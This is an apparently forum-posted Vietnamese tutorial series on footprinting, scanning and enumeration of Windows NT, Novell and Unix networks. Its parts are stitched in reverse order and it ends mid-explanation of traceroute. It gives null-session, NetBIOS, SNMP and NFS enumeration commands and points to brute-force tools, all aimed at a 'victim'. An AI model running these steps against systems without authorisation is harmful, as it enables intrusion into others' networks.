- NTRK là một bộ tài liệu bổ trợ cho WinNT có kèm CD chứa các trình tiện ích để quản lý mạng.NTRK chứa một tập hợp các trình tiện ích mạnh, đa dạng từ ngôn ngữ Perl phổ dụng đến các cổng của nhiều trình tiện ích Unix , đến các công cụ điều hành từ xa không có trong các phiên bản lẻ của WinNT.Nó là một bộ đồ nghề không thề thiếu cho các điều hành viên mạng NT và cũng là công cụ hữu ích cho các hacker muốn khai thác winNT. Cũng có lẽ vì đó mà giá bán lẻ của NTRK vào khoảng ... 200 USD. Hì, nhưng không sao, vẫn còn một giải pháp free cho bạn tại ftp://ftp.microsoft.com/bussys/winnt/winnt-public/reskit/
Trở lại vấn đề điểm danh các hệ điều khiển domain NT: để thực hiện công việc này, ta dùng công cụ có tên là nltest trong NTRK để định danh các PDC (Primary Domain Controllers ) và BDC ( Backup Domain Controllers )
Câu lệnh : C:\> nltest /delist:[domain name]
Thậm chí, để tiến xa hơn, ta cần dùng Holy Grail của tính năng điểm danh NT, tuyến nối rỗng , hoặc nặc danh ( sẽ giới thiệu sau đây ). Sau khi xác lập một phiên làm việc rỗng cho một trong các máy trên khu ủy điểm danh, ta có thể dùng cú pháp nltest /server:[server name] và /trusted_domain để tìm hiểu thêm các domain NT có liên quan đến domain đầu tiên !

** Phương pháp NT toàn cục **

Hầu hết các kỹ thuật thu thập thông tin mà tôi mô tả trong phần này đều vận dụng một thiếu sót về bảo mật của winNT là cho phép các người dùng nặc danh( anonymous user ) kết nồi và điểm danh một số tài nguyên nhất định mà không cần sự "cho phép" . Chỗ yếu này được biết đến với cái tên "Red Button"( hiii, chắc là nút login hay submit quá ), tuyến nối phiên làm việc rỗng hay đăng nhập nặc danh.....và nó vẫn là chỗ đứng có tiềm năng tàn phá nhất trên mạng mà hacker tìm kiếm. Tôi nhớ có một bài viết lưu truyền khá rộng rãi trên mạng với tiêu đề rất "ghê" là " hướng dẫn deface một trang web" trong đó hướng dẫn cách dò tìm chỗ yếu anonymous user và khai thác nó !
Để thực hiện một tuyến nối phiên làm việc rỗng, ta dùng cú pháp:
C:\> net use \\IP\IPC$ ''''''' /user:'''''
Cú pháp trên nối "phần dùng chung" truyền thông tin xử lý ẩn (IPC$) tại địa chỉ IP mà ta cung cấp dưới dạng người dùng nặc danh là [user:''''] và một mật hiệu rỗng [''''''']. Nếu thành công, ta có thể có một lệnh mở để sử dụng những kỹ thuật khác nhau nhằm "thu gom" càng nhiều thông tin càng tốt : thông tin mạng , các phần dùng chung, các người dùng , các nhóm , các khóa Registry..... Phương pháp chống NT toàn cục sẽ được nêu trong "basic security" của fantomas311 - mời bạn đón xem

*** Các phần dùng chung NetBIOS ***

Sau khi thiết lập một phiên làm việc rỗng, ta cũng có thể dùng lại lệnh net view để điểm danh các phần dùng chung trên hệ thống từ xa.
Ba công cụ điểm danh các phần dùng chung khác trong NTRK là rmtshare , srvcheck và srvinfo
Một trong các công cụ thích hợp nhất để điểm danh các tệp dùng chung NT( và các nội dung khác là Dump ACL .Download free tại http://38.15.19.115 Dump ACL kiểm toán mọi thứ, từ giấy phép hệ tập tin đến các dịch vụ sẵn dùng trên các hệ thống từ xa. Thậm chí nó còn có thể lấy thông tin người dùng cơ bản qua một tuyến nối rỗng vô hại, và có thể chạy từ dòng lệnh, tạo thuận lợi cho việc lập ký mã và tự động hóa.
Việc mở các tuyến nối rỗng và dùng các công cụ trên đây theo thủ công là một phương pháp tuyệt vời cho các cuộc tấn công có định hướng, nhưng hầu hết các hacker thường sử dụng một bộ quét NetBIOS để nhanh chóng kiểm tra nguyên cả mạng để tìm các tệp dùng chung phơi bày. Một trong các công cụ phổ dụng đó là Legion ( có thể tìm thấy trên nhiều kho tàng trữ internet ). Legion có thể nghiền ngẫm qua một mạng IP Class C và tiết lộ tất cả các tệp dùng chung sẵn dùng trong giao diện đồ họa của nó. Phiên bản 2.1 có gộp một "công cụ cưỡng bức", công cụ này sẽ cố gắng nối kết với một tệp dùng chung nhất định thông qua một danh sách các mật hiệu do người dùng cung cấp. Cách bẻ khóa cưỡng bức đối với Win9x và WinNT sẽ được nêu cụ thể ở các phần sau
Một bộ quét tệp dùng chung windows phổ dụng khác là NetBIOS Auditing Tool (NAT) có thể tìm thấy trên các kho tàng trữ internet

****Các kiểu điểm danh NT khác ****

Ngoài ra còn có một số bộ điểm danh thông tin mạng NT khác như : epdump của Microsoft ( http://www.ntshop.net/security/tools/def.htm ), getmac và netdom trong NTRK và netviewx ( http://www.ibt.ku.dk/jesper/NTtools/ ) epdump truy vấn bộ ánh xạ điểm cuối RPC và nêu các dịch vụ kết gán với các địa chỉ IP và các số hiệu cổng. Dùng phiên làm việc rỗng, get mac hiển thị các địa chỉ MAC và các thiết bị của các card giao tiếp mạng trên các máy từ xa. Điều này cung cấp các thông tin hữu ích giúp hacker định hình một hệ thống có nhiều giao diện trên mạng . netdom còn hữu ích hơn điểm danh các thông tin chính về các domain NT trên tuyến, bao gồm tư cách thành viên domain và các danh xưng của Backup Domain Controllers . netviewx thường được dùng để dò tìm NT Remote Access Services ( RAS ) đề thu được khái niệm về số lượng các hệ phục vụ quay số tồn tại trên mạng
Cuối cùng, quả thật đáng trách nếu không đề cập đến SNMP ( Simple Network Management Protocol ) như một nguồn thông tin NT tuyệt vời.SNMP sẽ được đề cập chi tiết hơn trong phần tiếp theo: kỹ thuật điểm danh người dùng ( user ) trong WinNT

+++ Điểm danh người dùng và nhóm ( user and group ) trong WinNT

Trước khi đề cập đến điểm danh người dùng như thế nào , hãy nói đến công cụ cần dùng cho kỹ thuật này .Sau khi định danh một danh sách user , hacker có thể sử dụng các công cụ đoán pass tự động ( brute force ). Cũng như trường hợp của các tệp dùng chung, các máy NT config sai dễ dàng phun ra các thông tin user
Một lần nữa, ta sẽ dùng tuyến nối rỗng để cung cấp khả năng truy cập ban đầu để chạy các công cụ hacking đã biết . cách đầu tiên và đơn giản nhất để định danh các user trên một hệ thống windows từ xa là dùng lệnh nbstat

C:\> nbstat -A [IP]

Kỹ thuật này cho ta nội dung bảng tên NetBIOS của hệ thống từ xa, nêu tên hệ thống, domai mà nó đang ở trong đó , và những user đã đăng nhập .
Có vài công cụ NTRK khác có thể cung cấp thông tin về các user ( dù có tuyến nối rỗng hay không ) chẳng hạn như các trình tiện ích usrstat , showgrps, local, global nhưng công cụ thông dụng để lấy thông tin của user nhất vẫn là DumpACL. DumpACL có thể kéo một danh sách các người dùng, các nhóm, và các quyền user của hệ thống NT.
Ngoài ra, hai công cụ điểm danh NT khác cũng khá mạnh là user2sid và sid2user của Evgenii Rudnyi ( xem http://www.chem.msu.sn:8080~rudnyi/NT/sid.txt ) muốn sử dụng tốt hai công cụ này cần phải có thời gian tìm hiểu. Tôi chỉ có thể nói là nó có thể làm việc ngay cả khi các quản trị mạng đã kích hoạt RestrictAnonymous , chỉ cần có thề truy cập port 139 !

****SNMP (Simple Network Management Protocol )****

Một hệ thống NT đang chạy các tác nhân NT SNMP có thể truy cập bằng các chuỗi cộng đồng ngầm định như "public".Việc điểm danh các user NT thông qua SNMP là một điều dễ dàng khi dùng trình duyệt SNMP snmputil trong NTRK.Tuy nhiên, công cụ này lại cung cấp rất nhiều số liệu được coi là "lùng bùng, khó nhớ, khó hiểu".Do đó, để tránh rắc rối ( hacking có quá nhiều rắc rối phải giải quyết rồi !!!) bạn có thể sử dụng trình duyệt SNMP của solar wind tên là IP network browser tại http://solarwinds.net . Trên đây là phần trình bày của fantomas311 về điểm danh WinNT , tiếp theo là điểm danh với Novell

********* NOVELL *********

Tuy nói WinNT là bạn của các "phiên làm việc rỗng" nhưng netware của Novell cũng gặp sự cố tương tự :

+++ Network Neighborhood smilieùng Network Neighborhood để tìm hiểu về các hệ phục vụ và các "cây" sẵn dùng trên đường truyền .Bước này không đe dọa trực tiếp thông tin, nó chỉ như một bước khởi động đơn giản mà thôi, làm được gì thì hay cái nấy !!

+++ Các tuyến nối Novell Client32

Chương trình Netware Services của Novell chạy trong khay hệ thống và cho phép quản lý các tuyến nối Netware của bạn thông qua tùy chọn Netware Connections khả năng này có thể cực kỳ quý giá trong việc quản lý các gắn kết và các đợt đăng nhập .Tuy nhiên, quan trọng hơn là sau khi tạo một mối gắn kết (attachment ), bạn có thể truy lục cậy NDS chứa hệ phục vụ, số hiệu tuyến nối, và địa chỉ mạng hoàn chỉnh.Điều này có thể hữu ích cho việc nối với hệ phục vụ về sau và giành quyền ưu tiên cấp điều hành (admin)

+++On-site Admin : Xem các hệ phục vụ Novell

Nếu không có tiến trình thẩm định quyền theo một hệ phục vụ đơn lẻ, bạn có thể dùng sản phẩm On-site Admin của Novell ( ftp://ftp.cdrom.com ) để xem tình trạng của mọi hệ phục vụ trên đường truyền.Thay vì gửi các yêu cầu quảng bá riêng, On-Site Admin dường như hiển thị các hệ phục vụ được Network Neighborhood lập cache, gửi các đợt quảng bá định kỳ riêng về các hệ phục vụ Novell trên mạng

+++On-site Admin duyệt cây :

Ta có thể duyệt hầu hết các cây Novell bằng On-site Admin. Trong trường hợp này , Client32 thực tế gắn kết với hệ phục vụ đã lựa bên trong cây. Lý do đó là theo ngầm định, Netware 4.x cho phép mọi người duyệt cây.Bạn có thể giảm thiểu điều này bằng cách bổ sung tính năng lọc các quyền thừa kế vào gốc cây. Những thông tin thu được quan On-Site Admin có thể giúp ta chuyển sang cuộc đột nhập hệ thống chủ động. Điểm danh NT kết thúc ở đây !!!!

******* UNIX *******

Hầu hết các thực thể Unix hiện đại đều dựa trên các tính năng nối mạng TCP/IP chuẩn và do đó không dễ gì công khai thông tin thoải mái như NT thông qua các giao diện NetBIOS hoặc NetWare .Tất nhiên, điều đó không có nghĩa là Unix không bị các kỹ thuật điểm danh tấn công, nhưng kỹ thuật nào sẽ cho ra các kết quả tốt nhất ??? Điều đó còn tùy thuộc vào cách cấu hình hệ thống. Ví dụ như Remote Procedure Call (RPC) , Network Information System (NIS) và Network File System (NFS) của Sun Microsystem nhắm đến trong nhiều năm qua. Ta sẽ đề cập đến một số kỹ thuật cổ điển ngay sau đây.
Trước khi đi tiếp, bạn nên nhớ rằng hầu hết các kỹ thuật mô tả trong part III này đều dùng các thông tin thu thập được từ các kỹ đợt quét cổng và kỹ thuật điểm danh OS đã nêu trong "basic hacking Part I và II"
+++Điểm danh tệp dùng chung và tài nguyên mạng Unix
Nguồn thông tin mạng Unix tốt nhất là những kỹ thuật TCP/IP đã mô tả trong Part II, nhưng một công cụ tuyệt vời hơn để đào sâu chính là trình tiện ích Unix showmount rất hữu ích trong việc điểm danh các hệ tập tin xuất khẩu NFS trên một mạng. Ví dụ : giả sử một đợt quét trước đó cho biết cổng 2049 (NFS) đang lắng chờ trên một đích tiềm năng . Như vậy, ta có thể dùng showmount để xem một cách chính xác các thư mục đang được share ra sao :

showmount -e 192.168.202.34
export list for 192.168.202.34
/pub (everyone)
/var (everyone)
/usr (user)

Khóa chuyển -e nêu danh sách xuất khẩu của hệ phục vụ NFS, đáng tiếc cho các nhà bảo mật ,và mừng cho hacker là lỗ rò rĩ thông tin này không thể nà bịt kín được , bởi đây là cách ứng xử ngầm định của NFS
NFS không là phần mềm chia sẻ tập tin duy nhất mà bạn tìm thấy trên Unix , nhờ tính phổ dụng ngày càng tăng của bộ phần mềm sampa nguồn mở, cung cấp các dịch vụ tập tin và in trôi chảy cho các hệ khách SMB (Server Message Block )tạo thành nền móng của tính năng nối mạng windows .Samba có thể download tại http://samba.org và được phân phối cùng với nhiều bộ Linux.Mặc dù tập tin cấu hình hệ phục vụ Samba (/etc/smb.conf) có một số tham số bảo mật dể hiểu, việc cấu hình sai vẫn có thể dẫn đến các tập tin dùng chung mạng không được bảo vệ.
Một nguồn tiềm năng khác về thông tin mạng của Unix là NIS.Sự cố chính với NIS là một khi biết được tên domain NIS của một hệ phục vụ, bạn có thể dùng một đợt truy vấn RPC đơn giản để thu thập bất kỳ bản ánh xạ NIS nào của nó. Các bản ánh xạ NIS là những phép ánh xạ phân phối thông tin quan trọng của từng hệ chủ domain chẳng hạn như nội dung tập tin passwd . Kiểu tấn công NIS truyền thống thường dùng các công cụ khách NIS để cố gắng đoán tên domain.
Ngoài ra, còn một số công cụ khai thác cũng khá hữu ích là psean và snmpwalk
+++Điểm danh người dùng và các nhóm Unix :Kỹ thuật này không thu được những thông tin thật quý giá, nó chỉ có thể cho bạn biết user nào là root trong hệ phục vụ đích. Công cụ : finger , rusers , rwho

Kỹ thuật hack cơ bản - Phần II


***** Scanning *****
=== Author : Fantomas311 ===

Nếu Foot Printing là thu thập tất cả thông tin có liên quan đến tổ chức đích thì Scan là một bước xác định xem trong mớ bòng bong kia thì cái nào là "xài được" bằng các đợt quét ping, quét cổng và các công cụ phát hiện tự động

Nếu kỹ thuật zone transfer cho ta 1 địa chỉ IP thì scan sẽ giúp ta xác định xem nó ở port nào và nó có phải là một IP thực hay không. Có một số server hiển thị cả các IP của mạng tư ( thí dụ như 10.10.10.0 ). Một địa chỉ IP như thế không thể định tuyến ( xem http://www.ietf.org/rfc/rfc1918.txt để biết thêm chi tiết)

++ Quét Ping mạng : Ngòai quét ping truyền thống bằng cách mở cửa sổ DOS và tyoe lệnh Ping như chúng ta đều biết, còn một số kiểu quét ping khác như :
+ Fping: dùng trong Unix ( http://ftp.tamu.edu/pub/Unix/src ) fping là một trình tiện ích gửi đi các yêu cầu mass ping theo kiểu song song vì thế fping quét được nhiều địa chỉ IP hơn so với ping
+ Nmap ( http://insecure.org/nmap ) : Có lẽ không cần nói nhiều về trình tiện ích này , có khá nhiều hướng dẫn đầy đủ cách sử dụng và chức năng của nmap trên mạng. Nmap cung cấp khả năng quét ping với tùy chọn -sP
+ Pinger : dùng cho Windows, sản phẩm miễn phí của Rhino9 ( http://207.98.195.250/software/ ) là một trong các trình tiện ích nhanh nhất sẳn có
+ Ping Sweep : Sản phẩm của Solarwinds, chạy khá nhanh, nhưng công cụ này có thể làm bão hòa một mạng có tuyến nối kết chậm ( Cái này xài ở VN ko ổn nên ko giới thiệu chi tiết )
+ WS Ping Proback ( http://www.ipswich.com ) và các công cụ netscan ( http://www.nwpsw.com ) đủ để quét một mạng nhỏ, tiện dụng và giao diện đơn giản , tuy nhien khá chậm so với pinger và ping sweep . Người mới bắt đầu nên sử dụng lọai này !

Về cơ bản thì ping là quá trình gửi và nhận các gói tin ICMP (Internet Control Messaging Protocol ) . Vậy nếu ICMP bị phong tỏa bởi quản trị mạng của chuyên khu đích thì sao ? Trường hợp điển hình là khi type lệnh ping một domain mà không nhận được hồi âm nào , lúc đó ICMP tại bộ định tuyến biên bị phong tỏa hoặc có một fire wall đã được thiết lập . Trong trường hợp này ta có hai lựa chọn :
+ Bỏ qua quét ping mà thực hiện quét cổng (port Scan) : Sẽ đề cập ở phần sau của bài viết này .
+ Thực hiện ping TCP:
- Dùng Nmap với tùy chọn -PT . Tùy chọn này sẽ gửi các gói tin TCP SYN đến mạng đích và đợi đáp ứng, các hệ chủ "còn sống" sẽ đáp ứng bằng một gói tin TCP SYN/ACK. Phương pháp này khá hiệu quả để xác định xem hệ chủ có còn sống hay không cho dù chuyên khu đã phong tỏa ICMP .Bạn nên lặp lại kiểu quét này vài lần trên các cổng chung như SMTP (25) , POP (110) , IMAD ( 143 ) , hoặc các cổng có thể là duy nhất đối với các chuyên khu nhất định
- HPing ( http://www.kyuzz.org/antirez/ ) là một trình tiện ích ping TCP khác có công năng bổ sung TCP qua mặt cả Nmap . Hping cho phép người dùng điều khiển các tùy chọn cụ thể về gói tin TCP có thể cho phép nó đi qua một số thiết bị kiểm sóat truy cập nhất định. Nhờ ấn định cổng đích với tùy chọn -P , bạn có thể phá vỡ vài thiết bị kiểm sóat truy cập tương tự như kỹ thuật trace route đã nêu ở Part I có thể dùng Hping để thực hiện các đợt quét ICMP và có thể phân mảnh [ fragment ] các gói tin có tiềm năng phớt lờ một số thiết bị kiểm soát truy cập .Hping sẽ được đề cập chi tiết hơn ở phần sau

Tóm lại , bước này cho phép xác định một cách chính xác các hệ thống còn sống hay không thông qua ICMP hoặc thông qua cổng quét chọn lọc . Làm như vậy, ta đã giảm bớt đáng kể tiến trình ấn định đích, tiết kiệm thời gian trắc nghiệm và thu hẹp trọng tâm của các hoạt động .

++ Truy vấn ICMP : Bạn có thể thu thập tất cả các kiểu thông tin quý giá về một hệ thống bằng cách đơn giản gửi một gói tin ICMP cho nó , các công cụ có thể down load tại http://securityfocus.com
++ Quét cổng (port scan): đến lúc này , ta đã định danh các hệ thống còn sống bằng cách dùng các đợt quét ping ICMP hoặc TCP và đã thu thập được một ít thông tin ICMP . Giờ đây ta đã sẵn sàng tiến trình quét cổng từng hệ thống. Quét cổng là tiến trình nối với các cổng TCP và UDP trên hệ đích để xác định các dịch vụ đang chạy hoặc đang ở trạng thái LISTENNING . Ta phải định danh các cổng đang lắng chờ nếu như muốn xác định kiểu hệ điều hành và các ứng dụng đang dùng. Các dịch vụ hoạt động đang lắng chờ (listenning) có thể cho phép một người dùng trái phép giành được quyến truy cập các hệ thống bị cấu hình sai. Sau đây,ta coi như các hệ thống mà ta đã định danh ở bước trên là còn sống ( alive ) , mục tiêu của việc quét cổng là :
+ Định danh các dịch vụ TCP và UDP đang chạy trên hệ đích
+ Định danh kiểu hệ điều hành của hệ đích
+ Định danh các ứng dụng cụ thể hoặc các phiên bản của một dịch vụ cụ thể

** Các kiểu quét : trước khi giới thiệu các công cụ quét cổng chủ yếu, ta phải xét qua các kỹ thuật quét cổng sẵn dùng :

* Quét nối TCP : kiểu quét này nối với cổng đích và hòan thành một đợt bắt tay ba chiều đầy đủ ( SYN , SYN/ACK , ACK ) hệ đích có thể dễ dàng phát hiện nó . Tiến trình bắt tay ba chiều TCP gồm :
= Gửi gói tin SYN đến hệ phục vụ
= Nhận gói tin SYN/ACK từ hệ phục vụ
= Gửi gói tin ACK đến hệ phục vụ

* Quét TCP SYN : kỹ thuật này là việc thực hiện một tuyến nối TCP đầy đủ, nghĩa là : gửi gói tin SYN đến cổng đích , ta có thể suy ra nó nằm trong trạng thái listenning. Nếu nhận được một RST/ACK nó thường cho thấy cổng đang không lắng chờ: một RST/ACK sẽ được gửi bởi hệ thống thực hiện quét cổng để một tuyến nồi đầy đủ không bao giờ được thiết lập.Kỹ thuật này có ưu điểm là mang tính lén lút hơn một tuyến nối TCP đầy đủ

* Quét TCP FIN : kỹ thuật này gửi một gói tin FIN cho cổng đích. Dựa trên RFC 793 ( http://www.ietf.org/rfc/rfc0793.txt ) hệ đích sẽ gửi trả một RTS cho tất cả các cổng đã đóng.Kỹ thuật này thường chỉ làm việc trên các ngăn xếp TCP/IP gốc Unix

* Quét TCP Xmas Tree : Kỹ thuật này gửi một gói tin FIN , URG và PUSH cho cổng đích dựa trên RFC 793, hệ đích sẽ gửi trả một RST của tất cả các cổng đã đóng.

* Quét TCP Null : giống TCP Xmas Tree

* Quét UDP : Kỹ thuật này gửi một gói tin UDP cho cổng đích. Nếu cổng đích đáp ứng bằng một thông điệp "ICMP port unreachable ", cổng đã đóng. Ngược lại, nếu không nhận được thông điệp trên, ta có thể suy ra cổng mở ! Độ chính xác của kỹ thuật này tùy thuộc nhiều vào yếu tố có liên quan đến việc sử dụng các tài nguyên mạng và hệ thống. Khi thực hiện các đợt quét cổng UDP, có thể sẽ cho kết quả khác nhau . Một số thực thi IP sẽ gửi trả tất cả các RTS của tất cả các cổng đã quét dẫu chúng có đang lắng chờ hay không

* Định danh các dịch vụ TCP và UDP đang chạy : trình tiện ích của một công cụ quét cổng tốt nhất là một thành phần quan trọng của tiến trình in dấu ấn. Tuy có nhiều bộ quét cổng sẵn dùng cho cả Unix và NT , nhưng tôi sẽ đề cập đến một số bộ quét cổng thông dụng và nhanh :

- Strobe :strobe là một trong những bộ quét TCP nhanh và đáng tin cậy sẵn dùng , được viết bởi Julian Arrange ( ftp.win.or.jp/pup/network/misc/strobe-105.ta.gz ) Một số tính năng chính của Strobe bao gồm khả năng tối ưu hóa các tài nguyên mạng, hệ thống và quét hệ đích một cách có hiệu quả . Ngòai tính hiệu quả , phiên bản 1.04 của strobe về sau sẽ nắm giữ các banner kết hợp của từng cổng mà chúng nối với . Điều này có thể giúp định danh hệ điều hành lẫn dịch vụ đang chạy . Tính năng nắm giữ banner sẽ được nói nhiều hơn ở Part III
Tuy nhiên Strobe cũng có một số nhược điểm là không cung cấp khả năng quét UDP và hệ đích có thể dễ dàng phát hiện

- Up_Scan : Nếu Strobe cung cấp khả năng quét TCP thì Up_Scan là một trong những bộ quét UDP tin cậy nhất ( http://wwdsilx.wwdsi.com ) Nhược điểm : dễ bị phát hiện

- Netcat : trình tiện ích này có thể thực hiện rất nhiều công việc , cũng như nmap, nóp là công cụ không thể thiếu trong hacking cũng như security. Để quét TCP và UDP , ta sử dụng các tùy chọn -v và -vv , -z, -wz, -u

- PortPro và PortScan: trong WinNT thì portPro và PortScan là hai trình tiện ích quét cổng nhanh nhất.PortPro cùa StOrM ( http://securityfocus.com )và portScan là sản phẩm của Rhad. PortScan cung cấp một miền các cổng để quét trong khi portpro đơn giản gia số các cổng của nó, nhưng cả hai đều không cung cấp các miền địa chỉ IP .Portpro là một trong những công cụ quét cổng nhanh nhất sẵn dùng , tuy nhiên càc tùy chọn của nó còn hạn chế !

- Ngòai ra, công cụ quét cổng mạnh nhất vẫn là nmap ( đã giới thiệu ở phần trước )

** Các công cụ phát hiện tự động:

+ Cheops ( http://www.marko.net/cheops/ ) cung cấp khả năng quét ping, trace route , khả năng quét cổng và tính năng phát hiện hệ điều hành
+ Tkined là một phần của bộ Scotty có tại http://wwwhome.cs.wtwente.nl/~choenw/Scotty/ là một bộ sọan thào mạng được viết trong TCL tích hợp các công cụ quản lý mạng khác nhau ,cho phép bạn phát hiện các mạng IP


Hết Part II - Tiếp theo sẽ là Part III - Enumeration (điểm danh mạng)
Kỹ thuật Hack cơ bản - Phần I

**** Foot Printing ****

Thân chào tất cả các bạn , nhằm đáp ứng nhu cầu học hỏi trong hacking và security, fantomas311 đã biên soạn một bộ bài viết "Basic hacking" và các bài viết liên quan đến hacking hệ thống để giới thiệu đến các bạn . Xin khuyến cáo với những ai muốn học hack một cách fast food là các bạn không nên đọc bài viết này ! Vì tôi không post những bài dạy hack cho các bạn , mà tôi chỉ post bài theo phương châm "hack như thế nào" . Hãy đọc , suy nghĩ và làm bằng đôi tay và khối óc của mình !!

Trước khi các hacker thực sự bắt tay vào việc, họ phải tiến hành 3 bước cơ bản là in dấu ấn (foot printing) , Quét (scanning) và điểm danh(enumeration). Bài viết này đề cập đến kỹ thuật in dấu ấn và những vấn đề liên quan.


**In dấu ấn là gì ??**

In dấu ấn là việc dùng các công cụ và kỹ thuật để lấy thông tin cơ bản đầu tiên về một tổ chức hoặc một chuyên khu web muốn tấn công ( trong bài viết này tạm gọi là victim). Việc in dấu ấn có hệ thống một tổ chức sẽ cho phép hacker thấy rõ tình hình an ninh ( độ bảo mật) của tổ chức đó.

**Tại sao cần in dấu ấn ??**

Foot Printing giúp có thể định danh tất cả các mẩu tin và nắm những thông tin cơ bản (đôi khi khá quan trọng) về victim

** Kỹ thuật in dấu ấn **

Có rất nhiều kỹ thuật in dấu ấn khác nhau, bài viết này sẽ mô tả các bước giúp bạn hoàn thành một đợt phân tích dấu ấn kỹ lưỡng.

*Bước 1:

định phạm vi hoạt động: Bước này nói cho đơn giản là bạn phải xác định rõ cái mà bạn muốn hack là gì ( một công ty , một server hay chỉ là một web cá nhân ... )

- Đối với người mới bắt đầu, bạn nên đọc kỹ và ghi lại những thông tin mà trang web cung cấp cho bạn ( những thông tin về nó , như số ĐT , mail của webmaster , địa chỉ ....). Có nhiều khi những thông tin này lại là "chiếc chìa khoá vàng" cho bạn smilie Những mục đáng quan tâm bao gồm :
+ Các vị trí
+ Các công ty hoặc thực thể liên quan
+ Các kết nối hoặc tin tức có được
+ Các ngôn ngữ bảo mật nêu rõ các cơ chế bảo mật đã thiết đặt ( cấu hình fire wall chẳng hạn )
+ Các số điện thoại , tên liên lạc và Email .....

Ngoài ra, bạn cũng có thể xem lại mã nguồn HTML để tìm những sơ hở trong lập trình , bên cạnh đó , những chú thích nằm trong các thẻ HTML như < ! và ~ cũng là một " tài nguyên" đáng khai thác !! ( thí dụ như smilie )
Sau khi nghiên cứu trang web , bạn tìm thêm những thông tin cung cấp các manh mối bổ sung về tình trạng của tổ chức và tình hình an ninh của nó ( trên báo chí , các bản tin trên NET chẳng hạn) . Những động cơ tìm kiếm là chìa khoá cho bạn . Sau đây là một vài động cơ tìm kiếm :

http://google.com smilie http://sec.gov
http://cyberarmy.com Http://deja.com
http://networksolution.com http://dogpile.com
http://astalavista.com http://ipswich.com
http://arin.net/whois/ http://ferretsoft.com

Okie, hãy tiến hành bước đấu tiên trong kỹ thuật Hack !! B)

*Bước 2 : điểm danh mạng

Trong bước này , việc đầu tiên là định danh các domain và mạng có liên quan đến victim . Muốn làm điều này , hãy truy xuất dữ liệu của network solution ( www.networksolution.com ) và American Registry for Internet Number ( www.arin.net )
Một số kiểu truy vấn :

+Organizational : Tất cả các thông tin có liên quan đến một tổ chức cụ thể
+Domain:---------------------------------- domain -------
+Network:-----------------------------------mạng hoặc IP
+Point of contact:-------------------------1 cá nhân cụ thể ( admin )

*Bước 3 : Truy vấn DNS

Sau khi định danh các domain của tổ chức đích (victim), bạn có thể bắt đầu truy vấn DNS . Nếu DNS được cấu hình bấp bênh, ta có thể moi được thông tin tiết lộ về tổ chức . Một trong những cách cấu hình sai nghiêm trọng nhất mà một điều hành viên có thể mắc phải là cho phép người dùng internet không tin cậy thực hiện chuyển giao miền DNS ( zone transfer). Sự cố này có thể cho thấy tên hệ chủ, các IP ẩn .... nói chung là các thông tin muốn che dấu ! Việc cung cấp địa chỉ IP bên trong cho 1 người dùng không tin cậy trên internet cũng giống như cung cấp bản đồ ngôi nhà mình cho kẻ trộm vậy !!
Đến đây, có lẽ bạn có một câu hỏi " Zone transfer - how ??" . Xin thưa là đây là một vấn đề khác, có lẽ tôi sẽ đề cập trong một bài viết khác của mình để tránh loãng bài viết smilie. Kết thúc bước 3 tại đây !

*Bước 4: trinh sát mạng

Sau khi đã có bản đồ trong tay, thì đây là giai đoạn "xâm nhập thực tế" để xác định lộ trình truy cập tiềm năng mạng ( tạm hiểu như là việc do thám để xác định các con đường trước khi tiến hành đánh cướp á mà ! )
Để thực hiện công việc này , xin giới hiệu các bạn chương trình trace route ( ftp://ftp.ec.lbl/traceroute.tar.z ) có trong hầu hết phiên bản của Unix & WinNT . Trong WinNT , nó có tên là tracert.
Trace route là một công cụ chẩn đoán do Van Jacobson viết để cho phép xem tuyến đường mà một gói tin IP sẽ theo từ server này sang server khác
Nếu bạn không rành các lệnh trong Unix , có thể dùng VIsual Route ( http://www.visualroute.com ) để thực hiện tiến trình trinh sát(tracerouting) này . Giao diện của visual route trông rất bắt mắt & dễ sử dụng. Nhưng không có tác dụng tốt với các mạng có quy mô lớn .
Ngoài ra , bạn còn có thể thực hiện một kỹ thuật phức tạp hơn gọi là "tiến trình quét giao thức firewall" (sẽ đề cập ở Basic hacking II - Scanning của fantomas311 )

Vậy là công đoạn đầu tiên của việc hack vào một hệ thống đã xong . Bây giờ, sau khi đã thực hiện hoàn tất các bước trên, bạn ( tôi chỉ nói những người đã làm đúng các bước trên) có thể tự hỏi : "vậy có tác dụng gì ??" Làm gì tiếp theo??" "những thông tin thu được có tác dụng gì?" " Có nhất thiết phải thực hiện bước này không ?? "
smilie Nhiều câu hỏi quá ! Nhưng xin để các bạn tự trả lời vậy ! Tôi chỉ trả lời 1 câu thôi ! Bước tiếp theo của quá trình hack - theo lý thuyết - là Scanning . Quá trình Scanning sẽ được đề cập trong bài viết tiếp theo của fantomas311 : " Basic Hacking part II - Scanning" smilie
Hy vọng bài viết này làm bạn hài lòng


Sơ Lược Trace Route


Trong bài viết trên tôi đã đề cập đến traceroute. Vậy Traceroute là gì ?? Mời các bạn xem bài viết sau:

Traceroute là gì?

Traceroute là một chương trình cho phép bạn xác định được đường đi của các gói packets từ máy bạn đến hệ thống đích trên mạng Internet.

Một ví dụ về Traceroute!

Traceroute có thể làm được gì? Bạn hãy xem ví dụ sau sẽ rõ!

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Tôi cần biết đường đi từ máy tôi đến một host trên mạng Internet có địa chỉ ip là 203.94.12.54. Tôi cần phải tracert đến nó! Như bạn thấy ở trên, các gói packets từ máy tôi muốn đến được 203.94.12.54 phải đi qua 13 hops(mắt xích) trên mạng. Đây là đưòng đi của các gói packets:

